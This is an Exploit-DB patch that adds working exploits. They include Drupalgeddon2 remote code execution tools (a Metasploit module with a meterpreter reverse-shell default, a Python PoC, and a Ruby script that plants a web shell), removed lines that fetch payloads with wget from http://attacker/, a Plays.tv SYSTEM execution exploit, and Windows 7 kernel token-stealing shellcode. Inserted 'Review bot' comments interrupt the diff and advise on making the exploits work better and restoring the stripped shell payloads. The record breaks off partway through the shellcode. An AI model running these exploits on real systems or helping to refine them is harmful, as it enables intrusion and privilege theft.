From d0cba5625fd42cb2ea7939009255d01cd38e3c74 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Wed, 18 Apr 2018 05:01:47 +0000 Subject: [PATCH] DB: 2018-04-18 12 changes to exploits/shellcodes Brave Browser < 0.13.0 - 'long alert() argument' Denial of Service Brave Browser < 0.13.0 - 'window.close(self)' Denial of Service AMD Plays.tv 1.27.5.0 - 'plays_service.exe' Arbitrary File Execution Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017) Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039) D-Link DIR-615 Wireless Router - Persistent Cross Site Scripting Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution Joomla! 
Component jDownloads 3.2.58 - Cross Site Scripting --- exploits/hardware/remote/44473.txt | 21 + exploits/php/remote/44482.rb | 102 ++++ exploits/php/webapps/44448.py | 19 +- exploits/php/webapps/44449.rb | 139 +++++- exploits/php/webapps/44454.txt | 2 +- exploits/php/webapps/44471.txt | 36 ++ exploits/windows/local/44474.txt | 16 + exploits/windows/local/44475.txt | 28 ++ exploits/windows/local/44476.py | 88 ++++ exploits/windows_x86/local/44478.cpp | 558 ++++++++++++++++++++++ exploits/windows_x86/local/44479.cpp | 666 +++++++++++++++++++++++++++ exploits/windows_x86/local/44480.cpp | 663 ++++++++++++++++++++++++++ files_exploits.csv | 13 +- 13 files changed, 2325 insertions(+), 26 deletions(-) create mode 100644 exploits/hardware/remote/44473.txt create mode 100755 exploits/php/remote/44482.rb create mode 100644 exploits/php/webapps/44471.txt create mode 100644 exploits/windows/local/44474.txt create mode 100644 exploits/windows/local/44475.txt create mode 100755 exploits/windows/local/44476.py create mode 100644 exploits/windows_x86/local/44478.cpp create mode 100644 exploits/windows_x86/local/44479.cpp create mode 100644 exploits/windows_x86/local/44480.cpp diff --git a/exploits/hardware/remote/44473.txt b/exploits/hardware/remote/44473.txt new file mode 100644 index 000000000..ff5bd1948 --- /dev/null +++ b/exploits/hardware/remote/44473.txt 
@@ -0,0 +1,21 @@ +###################################################################################### +# Exploit Title: D-Link DIR-615 Wireless Router - Persistent Cross Site Scripting (XSS) +# Date: 14.04.2018 +# Exploit Author: Sayan Chatterjee +# Vendor Homepage: http://www.dlink.co.in +# Hardware Link: http://www.dlink.co.in/products/?pid=678 +# Category: Hardware (Wi-fi Router) +# Hardware Version: T1 +# Firmware Version: 20.07 +# Tested on: Windows 10 +# CVE: CVE-2018-10110 +####################################################################################### + +Reproduction Steps: +------------------------------ +1. Go to your wi-fi router gateway [i.e: http://192.168.0.1] +2. Go to –> “Maintenance” –> “Admin” +3. Create a user with name alert_"HI" +4. Refresh the page and you will be having “HI” popup + +####################################################################################### \ No newline at end of file diff --git a/exploits/php/remote/44482.rb b/exploits/php/remote/44482.rb new file mode 100755 index 000000000..06591009a --- /dev/null +++ b/exploits/php/remote/44482.rb 
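Review bot: Step 3 of the reproduction steps, `Create a user with name alert_"HI"`, does not describe a working payload — as written the username is plain text and cannot produce the popup step 4 promises, so the actual injected string (presumably markup or an event handler placed in the user-name field) appears to have been lost on import. The entry should quote the literal value typed into the name field with its markup intact, and say which page renders it unescaped (the Maintenance → Admin user list, going by step 4), since that is what makes this persistent rather than reflected. A one-line statement of impact would also help, e.g. `# Any admin viewing the user list executes the stored script; requires an authenticated admin session to plant it`, hedged to what the steps show.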
@@ -0,0 +1,102 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Drupalgeddon2', + 'Description' => %q{ + CVE-2018-7600 / SA-CORE-2018-002 + Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 + allows remote attackers to execute arbitrary code because of an issue affecting + multiple subsystems with default or common module configurations. + + The module can load msf PHP arch payloads, using the php/base64 encoder. + + The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));' + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Vitalii Rudnykh', # initial PoC + 'Hans Topo', # further research and ruby port + 'José Ignacio Rojo' # further research and msf module + ], + 'References' => + [ + ['SA-CORE', '2018-002'], + ['CVE', '2018-7600'], + ], + 'DefaultOptions' => + { + 'encoder' => 'php/base64', + 'payload' => 'php/meterpreter/reverse_tcp', + }, + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => [ARCH_PHP], + 'Targets' => + [ + ['User register form with exec', {}], + ], + 'DisclosureDate' => 'Apr 15 2018', + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/']), + ]) + + register_advanced_options( + [ + + ]) + end + + def uri_path + normalize_uri(target_uri.path) + end + + def exploit_user_register + data = Rex::MIME::Message.new + data.add_part("php -r '#{payload.encoded}'", nil, nil, 'form-data; name="mail[#markup]"') + data.add_part('markup', nil, nil, 'form-data; name="mail[#type]"') + data.add_part('user_register_form', nil, nil, 'form-data; name="form_id"') + data.add_part('1', nil, nil, 'form-data; name="_drupal_ajax"') + 
data.add_part('exec', nil, nil, 'form-data; name="mail[#post_render][]"') + post_data = data.to_s + + # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax + send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{uri_path}user/register", + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => post_data, + 'vars_get' => { + 'element_parents' => 'account/mail/#value', + 'ajax_form' => '1', + '_wrapper_format' => 'drupal_ajax', + } + }) + end + + ## + # Main + ## + + def exploit + case datastore['TARGET'] + when 0 + exploit_user_register + else + fail_with(Failure::BadConfig, "Invalid target selected.") + end + end + end \ No newline at end of file diff --git a/exploits/php/webapps/44448.py b/exploits/php/webapps/44448.py index 392e2ba3a..e116a0af1 100755 --- a/exploits/php/webapps/44448.py +++ b/exploits/php/webapps/44448.py 
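Review bot: `exploit_user_register` discards the return value of `send_request_cgi`, so an unreachable host, a 404 on a wrong `TARGETURI`, or a patched target that rejects the request all look identical to success and the module just sits on the handler; capture it and fail explicitly, `res = send_request_cgi({ ... })` followed by `fail_with(Failure::Unreachable, 'No response from target') unless res`, and treat a non-200 as `Failure::NotVulnerable`. The request path is built by string concatenation, `"#{uri_path}user/register"`, which produces `/drupaluser/register` when `TARGETURI` is set to `/drupal` without a trailing slash, because `normalize_uri(target_uri.path)` does not append one; `'uri' => normalize_uri(target_uri.path, 'user', 'register')` handles both spellings. `register_advanced_options([])` is an empty call and can be dropped. A `check` method that sends the same form with a harmless `#markup` value and inspects the AJAX response would let users confirm exposure without firing a payload; the response format needed for that is not visible here, so it would need confirming against a test instance.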
@@ -10,12 +10,23 @@ print ('# https://github.com/a2u/CVE-2018-7600') print ('################################################################') print ('Provided only for educational or information purposes\n') -target = raw_input('Enter target url (example: https://domain.ltd/): ') +target = input('Enter target url (example: https://domain.ltd/): ') + +# Add proxy support (eg. BURP to analyze HTTP(s) traffic) +# set verify = False if your proxy certificate is self signed +# remember to set proxies both for http and https +# +# example: +# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} +# verify = False +proxies = {} +verify = True url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' -payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'} +payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo ";-)" | tee hello.txt'} -r = requests.post(url, data=payload) -if r.status_code != 200: +r = requests.post(url, proxies=proxies, data=payload, verify=verify) +check = requests.get(target + 'hello.txt') +if check.status_code != 200: sys.exit("Not exploitable") print ('\nCheck: '+target+'hello.txt') \ No newline at end of file diff --git a/exploits/php/webapps/44449.rb b/exploits/php/webapps/44449.rb index 053f2ae56..b9a1bda11 100755 --- a/exploits/php/webapps/44449.rb +++ b/exploits/php/webapps/44449.rb 
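Review bot: The verification request `check = requests.get(target + 'hello.txt')` does not pass `proxies=proxies, verify=verify`, so in the Burp setup the new comments describe only the exploit POST goes through the proxy, and with `verify = False` against a self-signed certificate the check still verifies and raises `SSLError` after the payload has already executed. Use `check = requests.get(target + 'hello.txt', proxies=proxies, verify=verify)`. The POST's own status is now ignored entirely and an unreachable target raises an unhandled `ConnectionError` before the check runs, so a `try`/`except requests.RequestException` around the POST with a clear message would make failures legible. The `tee hello.txt` payload assumes PHP's working directory is the document root served at `target`; that assumption is worth stating next to the payload, since a different docroot makes a successful exploit print "Not exploitable".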
@@ -1,41 +1,142 @@ -# EDB-Note. Have the contents of "shell" on http://attacker/shell.php +#!/usr/bin/env ruby +# +# Hans Topo & g0tmi1k's ruby port of Drupalggedon2 exploit ~ https://github.com/dreadlocked/Drupalgeddon2/ (EDBID: 44449 ~ https://www.exploit-db.com/exploits/44449/) +# Based on Vitalii Rudnykh exploit ~ https://github.com/a2u/CVE-2018-7600 (EDBID: 44448 ~ https://www.exploit-db.com/exploits/44448/) +# Hans Topo ~ https://github.com/dreadlocked +# g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k +# +# Drupal Advisory ~ https://www.drupal.org/sa-core-2018-002 +# Vulnerable Versions: +# < 7.58 +# 8.x < 8.3.9 +# 8.4.x < 8.4.6 (TESTED) +# 8.5.x < 8.5.1 (TESTED) +# +# WriteUp & Thx ~ https://research.checkpoint.com/uncovering-drupalgeddon-2/ +# REF phpinfo() ~ https://twitter.com/i_bo0om/status/984674893768921089 (curl - user/register - mail - #post_render) +# REF phpinfo() ~ https://twitter.com/RicterZ/status/984495201354854401 (burp - user//edit [requires auth] - mail - #lazy_builder) +# REF 2x RCE ~ https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708 (curl - user/register - mail & timezone - #lazy_builder & #post_render) +# REF RCE ~ https://gist.github.com/AlbinoDrought/626c07ee96bae21cb174003c9c710384 (curl - user/register - mail - #post_render) +# REF rev_nc ~ https://gist.github.com/AlbinoDrought/2854ca1b2a9a4f33ca87581cf1e1fdd4 (curl - user/register - mail - #post_render) +# Collection ~ https://github.com/g0rx/CVE-2018-7600-Drupal-RCE +# +# +# Drupal Version ~ https://example.com/CHANGELOG.txt +# + +require 'base64' +require 'json' require 'net/http' +require 'openssl' -# Hans Topo ruby port from Drupalggedon2 exploit. -# Based on Vitalii Rudnykh exploit +# Proxy information (nil to disable) +proxy_addr = nil +proxy_port = 8080 + + +# Quick how to use +if ARGV.empty? 
+ puts "Usage: ruby drupalggedon2.rb " + puts " ruby drupalgeddon2.rb https://example.com whoami" + exit +end + +# Read in values target = ARGV[0] command = ARGV[1] -url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' -shell = "" +# Banner +puts "[*] --==[::#Drupalggedon2::]==--" +puts "-"*80 + + +# Check input for protocol +if not target.start_with?('http') + target = "http://" + target +end + +# Check input for the end +if not target.end_with?('/') + target += "/" +end + + +# Payload +#evil = 'uname -a' +evil = '' +evil = "echo " + Base64.encode64(evil).strip + " | base64 -d | tee s.php" + + +# PHP function to use +phpmethod = 'exec' + + +# Feedback +puts "[*] Target : " + target +puts "[*] Command: " + command +puts "[*] PHP cmd: " + phpmethod + + +# Method #1 - timezone & lazy_builder - response is 500 & blind (will need to disable target check for this to work!) +#url = target + 'user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax' +# Vulnerable Parameters: access_callback / lazy_builder / pre_render/ post_render +#payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=" + evil + + +# Method #2 - mail & post_render - response is 200 +url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' +# Vulnerable Parameters: access_callback / lazy_builder / pre_render/ post_render +payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpmethod + "&mail[a][#type]=markup&mail[a][#markup]=" + evil -payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec' uri = URI(url) +http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port) -http = Net::HTTP.new(uri.host,uri.port) - +# Use SSL/TLS if 
needed if uri.scheme == 'https' - http.use_ssl = true - http.verify_mode = OpenSSL::SSL::VERIFY_NONE + http.use_ssl = true + http.verify_mode = OpenSSL::SSL::VERIFY_NONE end -req = Net::HTTP::Post.new(uri.path) +# Make the request +req = Net::HTTP::Post.new(uri.request_uri) req.body = payload -response = http.request(req) +# Feedback +puts "[*] Payload: " + evil +#puts "[*] Sending: " + payload +puts "-"*80 -if response.code != "200" - puts "[*] Response: " + response.code - puts "[*] Target seems not to be exploitable" - exit + +# Check response +response = http.request(req) +if response.code == "200" + puts "[+] Target seems to be exploitable! w00hooOO!" + puts "[+] Result: " + JSON.pretty_generate(JSON[response.body] ) +else + puts "[!] Target does NOT seem to be exploitable ~ Response: " + response.code + #exit end -puts "[*] Target seems to be exploitable." -exploit_uri = URI(target+"/sh.php?cmd=#{command}") +# Feedback +puts "-"*80 +puts "[*] curl '" + target + "s.php?c=#{command}'" +puts "-"*80 + +# Now run our command +exploit_uri = URI(target + "s.php?c=#{command}") + +# Check response response = Net::HTTP.get_response(exploit_uri) -puts response.body \ No newline at end of file +if response.code != "200" + puts "[!] Exploit FAILED ~ Response: " + response.code + exit +end + + +# Result +puts "[+] Output: " + response.body \ No newline at end of file diff --git a/exploits/php/webapps/44454.txt b/exploits/php/webapps/44454.txt index 2ad5b5578..065dd0f53 100644 --- a/exploits/php/webapps/44454.txt +++ b/exploits/php/webapps/44454.txt @@ -1,5 +1,5 @@ # Exploit Title: Cobub Razor 0.8.0 SQL injection Vulnerability -# Date: 2018-04-14 +# Date: 2018-04-16 # Exploit Author: Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn) # Vendor Homepage: http://www.cobub.com/ # Software Link: https://github.com/cobub/razor diff --git a/exploits/php/webapps/44471.txt b/exploits/php/webapps/44471.txt new file mode 100644 index 000000000..ce8890bd6 --- /dev/null 
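Review bot: The usage guard only tests `ARGV.empty?`, so running the script with a target but no command leaves `command` nil and `puts "[*] Command: " + command` raises `TypeError` before any request is sent; use `if ARGV.length < 2` in the guard. `command` is also interpolated raw into `URI(target + "s.php?c=#{command}")`, so a command containing a space raises `URI::InvalidURIError` and one containing `&` is truncated server-side — wrap it as `URI.encode_www_form_component(command)`. The result fetch `Net::HTTP.get_response(exploit_uri)` bypasses the `proxy_addr`/`proxy_port` and `VERIFY_NONE` configuration built for the first request, so HTTPS targets with self-signed certificates fail at the output step even when the injection succeeded; reuse the `http` object with a `Net::HTTP::Get` for that request. Note that `evil = ''` in this listing is empty, so `s.php` is written as a zero-byte file; presumably the PHP web-shell body was stripped on import and should be restored, and the comment above it should say what `s.php` is expected to contain.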
+++ b/exploits/php/webapps/44471.txt @@ -0,0 +1,36 @@ +####################################### +# Exploit Title: Joomla! Component jDownloads 3.2.58 - Cross Site Scripting +# Google Dork: N/A +# Date: 14-04-2018 +####################################### +# Exploit Author: Sureshbabu Narvaneni# +####################################### +# Author Blog : http://nullnews.in +# Vendor Homepage: http://www.jdownloads.com/ +# Software Link: http://www.jdownloads.com/index.php/downloads/category/6-jdownloads.html +# Affected Version: 3.2.58 +# Category: WebApps +# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686 +# CVE : CVE-2018-10068 +# +# 1. Vendor Description: +# +# Exclusive Download manager for Joomla! +# +# 2. Technical Description: +# +# Cross-site scripting (XSS) vulnerability in plupoad flash component in jDownloads before 3.2.59 allows remote attackers to inject arbitrary web script. +# +# 3. Proof Of Concept: +# +http://url/joomla/administrator/components/com_jdownloads/assets/plupload/js/Moxie.swf?target%g=alert&uid%g=nice +# +# 4. Solution: +# +# Upgrade to latest release. +# https://extensions.joomla.org/extension/jdownloads/ +# +# 5. Reference: +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10068 +# https://vel.joomla.org/resolved/2150-jdownloads-3-2-58-xss-cross-site-scripting +##################################### \ No newline at end of file diff --git a/exploits/windows/local/44474.txt b/exploits/windows/local/44474.txt new file mode 100644 index 000000000..b00cf02c7 --- /dev/null +++ b/exploits/windows/local/44474.txt @@ -0,0 +1,16 @@ +# Exploit Title:Brave Browser < 0.13.0 Denial of Service (resource consumption) via a long alert() argument. +# Date: 2017-10-16 +# Exploit Author: Sahil Tikoo +# Vendor Homepage: https://brave.com +# Software Link: https://github.com/brave/browser-laptop +# Version: 0.12.5 +# Tested on: Kali Linux,Ubuntu ,Windows OS +# CVE : CVE-2017-18256 + + +#PoC + + + \ No newline at end of file 
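Review bot: The Solution section says only "Upgrade to latest release" although the technical description already names the fixed version (`before 3.2.59`); state it directly, `# Upgrade to jDownloads 3.2.59 or later`, so a reader can verify a deployment without chasing the vendor page. "plupoad" in the technical description is a typo for plupload. Since the vector is the bundled `Moxie.swf` Flash component with the payload carried in the query string, the entry should say that this is a reflected XSS requiring a browser with Flash enabled, which the title does not convey.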
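Review bot: The `#PoC` section is followed only by blank lines — the HTML/JavaScript trigger the title describes (an `alert()` call with a very long argument) is absent from the file as committed, so the entry cannot be reproduced from this listing; if the markup was stripped on import it should be restored, and at minimum a prose line such as `# PoC: a page that calls alert() with a multi-megabyte string argument; the renderer hangs (resource consumption)` should state the trigger, limited to what the title claims. The header lists Kali and Ubuntu under "Tested on", which sits oddly with the `exploits/windows/local/` placement for a browser-delivered DoS; the category is worth a second look.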
diff --git a/exploits/windows/local/44475.txt b/exploits/windows/local/44475.txt new file mode 100644 index 000000000..4f96944a8 --- /dev/null +++ b/exploits/windows/local/44475.txt @@ -0,0 +1,28 @@ +# Exploit Title:Brave Browser < 0.13.0 Denial of Service (resource consumption) via a window.close(self) js code. +# Date: 2017-10-16 +# Exploit Author: Sahil Tikoo +# Vendor Homepage: https://brave.com +# Software Link: https://github.com/brave/browser-laptop +# Version: 0.12.5 +# Tested on: Kali Linux,Ubuntu ,Windows OS +# CVE : CVE-2016-10718 + + +Brave Window Object Remote Denial of Service. + + +

+

Brave Window Object Remote Denial of Service



+

Proof of Concept


+ +
+Click the below link to Trigger the Vulnerability..

+
+ +
+
Brave Window Object DoS Test POC
+ +
+ + + \ No newline at end of file diff --git a/exploits/windows/local/44476.py b/exploits/windows/local/44476.py new file mode 100755 index 000000000..5f5fb9e17 --- /dev/null +++ b/exploits/windows/local/44476.py 
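Review bot: Only the visible text of the PoC page survives here ("Brave Window Object Remote Denial of Service", "Click the below link to Trigger the Vulnerability..", "Brave Window Object DoS Test POC") — the link target and the script body carrying the `window.close(self)` call named in the title are not in the file, so nothing in the entry actually triggers the bug. If the HTML was stripped on import it should be restored; otherwise a one-line prose description of the trigger (`# PoC: a link whose handler calls window.close(self) on the current window object`) should be added, kept to what the title states. Given the content is an HTML page, storing it with an `.html` extension rather than `.txt` would keep future imports from flattening it again.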
@@ -0,0 +1,88 @@ +######################################################################## +# http://support.amd.com/en-us/download?cmpid=CCCOffline - +# Click "Automatically Detect - Download Now" +# Installation Automatically Installs "Raptr, Inc Plays TV Service" +# +# OR +# +# https://plays.tv/download +# +# Target OS: Windows( Any ) +# Privilege: SYSTEM +# Type: Arbitrary File Execution +# +# Notes: Second minor bug allows for arbitrary file write of +# uncontrolled data using the /extract_files path. +# +######################################################################## + +#!/usr/bin/python3 +import urllib.request +import json +import hashlib + +def check_svc( path, data ): + + #Setup request + request = urllib.request.Request(addr) + + #add post data + try: + resp = urllib.request.urlopen(request, "data".encode("utf-8")) + return "[-] Not Raptr, Plays TV service" + except urllib.error.HTTPError as err: + error_message = err.read().decode("utf-8") + if error_message == 'Security failed - Missing hash or message[data]': + return "[+] Raptr, Plays TV service" + +def post_req( path, data ): + + secret_key = 'a%qs0t33QgiE6ut^0I&Y' + + #Setup request + request = urllib.request.Request(addr) + json_data = json.dumps(data) + + m = hashlib.md5() + hash_data = path + json_data + secret_key + m.update(hash_data.encode('utf8')) + hash_str = m.hexdigest() + + #add post data + p_data = urllib.parse.urlencode({'data' : json_data, 'hash' : hash_str }).encode("utf-8") + resp = urllib.request.urlopen(request, p_data) + return resp.read() + +#Target IP address +ip = '127.0.0.1' + +############################################################## +# The service binds to an ephemeral port defined at +# [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\PlaysTV\Service] +############################################################## +port = 50452 + +############################################################## +# The service calls CreateProcess with the following format: +# '"%s" 
-appdata "%s" -auto_installed 1' % (installer, appdata) +# +# One way to achieving remote code execution is to use SMB +# cmd = "\\\\\\\\" +############################################################## +cmd = "C:\\Windows\\System32\\calc.exe" #Local Execution +data = { + "installer": cmd, + "appdata": cmd +} + +#Set url +path = '/execute_installer' +addr = 'http://' + ip + ':' + str(port) + path + +#Check if the remote service is a Raptr Plays TV svc +#ret = check_svc(data, path) +#print(ret) + +#Exploit service +ret = post_req(path, data) +print(ret) \ No newline at end of file diff --git a/exploits/windows_x86/local/44478.cpp b/exploits/windows_x86/local/44478.cpp new file mode 100644 index 000000000..172cf36d7 --- /dev/null +++ b/exploits/windows_x86/local/44478.cpp 
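Review bot: `check_svc(path, data)` ignores both of its parameters and reads the module-global `addr`, and its `except` branch falls off the end returning `None` whenever the error text differs from the exact "Security failed" string, so a caller cannot distinguish "not the service" from "unexpected reply"; the commented-out call site `check_svc(data, path)` also passes the arguments in the wrong order. Build the URL from the parameter, `request = urllib.request.Request('http://' + ip + ':' + str(port) + path)`, and end the function with an explicit `return "[-] Unexpected response: " + error_message`. The `#!/usr/bin/python3` line sits after the header comment, so it is not a shebang and `./44476.py` will not select Python 3 — move it to line 1. `urllib.parse` and `urllib.error` are used without their own imports (they only resolve because `urllib.request` happens to load them); add `import urllib.parse` and `import urllib.error` next to `import urllib.request`. The hard-coded `secret_key` is the root cause — a client-side shared secret for an MD5 request "signature" — and deserves one line in the header so the reader sees why the hash check is bypassable.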
@@ -0,0 +1,558 @@ +#include +#include +#include +#include +#pragma comment(lib, "psapi.lib") + +#define POCDEBUG 0 + +#if POCDEBUG == 1 +#define POCDEBUG_BREAK() getchar() +#elif POCDEBUG == 2 +#define POCDEBUG_BREAK() DebugBreak() +#else +#define POCDEBUG_BREAK() +#endif + +static PVOID(__fastcall *pfnHMValidateHandle)(HANDLE, BYTE) = NULL; + +static constexpr UINT num_PopupMenuCount = 2; +static constexpr UINT num_WndShadowCount = 3; +static constexpr UINT num_NtUserMNDragLeave = 0x11EC; +static constexpr UINT num_offset_WND_pcls = 0x64; + +static HMENU hpopupMenu[num_PopupMenuCount] = { 0 }; +static UINT iMenuCreated = 0; +static BOOL bDoneExploit = FALSE; +static DWORD popupMenuRoot = 0; +static HWND hWindowMain = NULL; +static HWND hWindowHunt = NULL; +static HWND hWindowList[0x100] = { 0 }; +static UINT iWindowCount = 0; +static PVOID pvHeadFake = NULL; +static PVOID pvAddrFlags = NULL; + +typedef struct _HEAD { + HANDLE h; + DWORD cLockObj; +} HEAD, *PHEAD; + +typedef struct _THROBJHEAD { + HEAD head; + PVOID pti; +} THROBJHEAD, *PTHROBJHEAD; + +typedef struct _DESKHEAD { + PVOID rpdesk; + PBYTE pSelf; +} DESKHEAD, *PDESKHEAD; + +typedef struct _THRDESKHEAD { + THROBJHEAD thread; + DESKHEAD deskhead; +} THRDESKHEAD, *PTHRDESKHEAD; + +typedef struct _SHELLCODE { + DWORD reserved; + DWORD pid; + DWORD off_CLS_lpszMenuName; + DWORD off_THREADINFO_ppi; + DWORD off_EPROCESS_ActiveLink; + DWORD off_EPROCESS_Token; + PVOID tagCLS[0x100]; + BYTE pfnWindProc[]; +} SHELLCODE, *PSHELLCODE; + +static PSHELLCODE pvShellCode = NULL; + +// Arguments: +// [ebp+08h]:pwnd = pwndWindowHunt; +// [ebp+0Ch]:msg = 0x9F9F; +// [ebp+10h]:wParam = popupMenuRoot; +// [ebp+14h]:lParam = NULL; +// In kernel-mode, the first argument is tagWND pwnd. +static +BYTE +xxPayloadWindProc[] = { + // Loader+0x108a: + // Judge if the `msg` is 0x9f9f value. 
+ 0x55, // push ebp + 0x8b, 0xec, // mov ebp,esp + 0x8b, 0x45, 0x0c, // mov eax,dword ptr [ebp+0Ch] + 0x3d, 0x9f, 0x9f, 0x00, 0x00, // cmp eax,9F9Fh + 0x0f, 0x85, 0x8d, 0x00, 0x00, 0x00, // jne Loader+0x1128 + // Loader+0x109b: + // Judge if CS is 0x1b, which means in user-mode context. + 0x66, 0x8c, 0xc8, // mov ax,cs + 0x66, 0x83, 0xf8, 0x1b, // cmp ax,1Bh + 0x0f, 0x84, 0x80, 0x00, 0x00, 0x00, // je Loader+0x1128 + // Loader+0x10a8: + // Get the address of pwndWindowHunt to ECX. + // Recover the flags of pwndWindowHunt: zero bServerSideWindowProc. + // Get the address of pvShellCode to EDX by CALL-POP. + // Get the address of pvShellCode->tagCLS[0x100] to ESI. + // Get the address of popupMenuRoot to EDI. + 0xfc, // cld + 0x8b, 0x4d, 0x08, // mov ecx,dword ptr [ebp+8] + 0xff, 0x41, 0x16, // inc dword ptr [ecx+16h] + 0x60, // pushad + 0xe8, 0x00, 0x00, 0x00, 0x00, // call $5 + 0x5a, // pop edx + 0x81, 0xea, 0x43, 0x04, 0x00, 0x00, // sub edx,443h + 0xbb, 0x00, 0x01, 0x00, 0x00, // mov ebx,100h + 0x8d, 0x72, 0x18, // lea esi,[edx+18h] + 0x8b, 0x7d, 0x10, // mov edi,dword ptr [ebp+10h] + // Loader+0x10c7: + 0x85, 0xdb, // test ebx,ebx + 0x74, 0x13, // je Loader+0x10de + // Loader+0x10cb: + // Judge if pvShellCode->tagCLS[ebx] == NULL + 0xad, // lods dword ptr [esi] + 0x4b, // dec ebx + 0x83, 0xf8, 0x00, // cmp eax,0 + 0x74, 0xf5, // je Loader+0x10c7 + // Loader+0x10d2: + // Judge if tagCLS->lpszMenuName == popupMenuRoot + 0x03, 0x42, 0x08, // add eax,dword ptr [edx+8] + 0x39, 0x38, // cmp dword ptr [eax],edi + 0x75, 0xee, // jne Loader+0x10c7 + // Loader+0x10d9: + // Zero tagCLS->lpszMenuName + 0x83, 0x20, 0x00, // and dword ptr [eax],0 + 0xeb, 0xe9, // jmp Loader+0x10c7 + // Loader+0x10de: + // Get the value of pwndWindowHunt->head.pti->ppi->Process to ECX. + // Get the value of pvShellCode->pid to EAX. 
+ 0x8b, 0x49, 0x08, // mov ecx,dword ptr [ecx+8] + 0x8b, 0x5a, 0x0c, // mov ebx,dword ptr [edx+0Ch] + 0x8b, 0x0c, 0x0b, // mov ecx,dword ptr [ebx+ecx] + 0x8b, 0x09, // mov ecx,dword ptr [ecx] + 0x8b, 0x5a, 0x10, // mov ebx,dword ptr [edx+10h] + 0x8b, 0x42, 0x04, // mov eax,dword ptr [edx+4] + 0x51, // push ecx + // Loader+0x10f0: + // Judge if EPROCESS->UniqueId == pid. + 0x39, 0x44, 0x0b, 0xfc, // cmp dword ptr [ebx+ecx-4],eax + 0x74, 0x07, // je Loader+0x10fd + // Loader+0x10f6: + // Get next EPROCESS to ECX by ActiveLink. + 0x8b, 0x0c, 0x0b, // mov ecx,dword ptr [ebx+ecx] + 0x2b, 0xcb, // sub ecx,ebx + 0xeb, 0xf3, // jmp Loader+0x10f0 + // Loader+0x10fd: + // Get current EPROCESS to EDI. + 0x8b, 0xf9, // mov edi,ecx + 0x59, // pop ecx + // Loader+0x1100: + // Judge if EPROCESS->UniqueId == 4 + 0x83, 0x7c, 0x0b, 0xfc, 0x04, // cmp dword ptr [ebx+ecx-4],4 + 0x74, 0x07, // je Loader+0x110e + // Loader+0x1107: + // Get next EPROCESS to ECX by ActiveLink. + 0x8b, 0x0c, 0x0b, // mov ecx,dword ptr [ebx+ecx] + 0x2b, 0xcb, // sub ecx,ebx + 0xeb, 0xf2, // jmp Loader+0x1100 + // Loader+0x110e: + // Get system EPROCESS to ESI. + // Get the value of system EPROCESS->Token to current EPROCESS->Token. + // Add 2 to OBJECT_HEADER->PointerCount of system Token. + // Return 0x9F9F to the caller. + 0x8b, 0xf1, // mov esi,ecx + 0x8b, 0x42, 0x14, // mov eax,dword ptr [edx+14h] + 0x03, 0xf0, // add esi,eax + 0x03, 0xf8, // add edi,eax + 0xad, // lods dword ptr [esi] + 0xab, // stos dword ptr es:[edi] + 0x83, 0xe0, 0xf8, // and eax,0FFFFFFF8h + 0x83, 0x40, 0xe8, 0x02, // add dword ptr [eax-18h],2 + 0x61, // popad + 0xb8, 0x9f, 0x9f, 0x00, 0x00, // mov eax,9F9Fh + 0xeb, 0x05, // jmp Loader+0x112d + // Loader+0x1128: + // Failed in processing. 
